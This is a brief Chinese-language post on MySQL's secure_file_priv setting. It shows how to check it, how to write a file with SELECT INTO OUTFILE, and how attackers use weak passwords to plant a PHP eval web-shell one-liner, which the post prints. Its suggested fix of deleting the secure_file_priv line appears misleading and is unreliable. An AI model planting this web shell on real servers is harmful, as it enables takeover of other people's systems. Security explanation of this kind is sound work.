①：首先连接上数据库

②：执行SQL语句show variables like '%secure%';（查询是否可以注入）

③：对照表查看是否可注入

④：发现可注入执行 select '注入的内容' INTO OUTFILE 'C:\\Users\\Administrator\\Desktop\\test.txt';（注入到桌面的SQL）

⑤：网络上的有些大佬也是通过扫描数据库使用弱口令拿到你的数据库然后通过数据库注入木马，从而拿下你的服务器。

例如向你的网站指定路径注入（<?php @eval($_POST[test])?>）这段php木马。

⑥：解决方法

打开数据库my.cnf或my.ini，

然后删除secure_file_priv这句。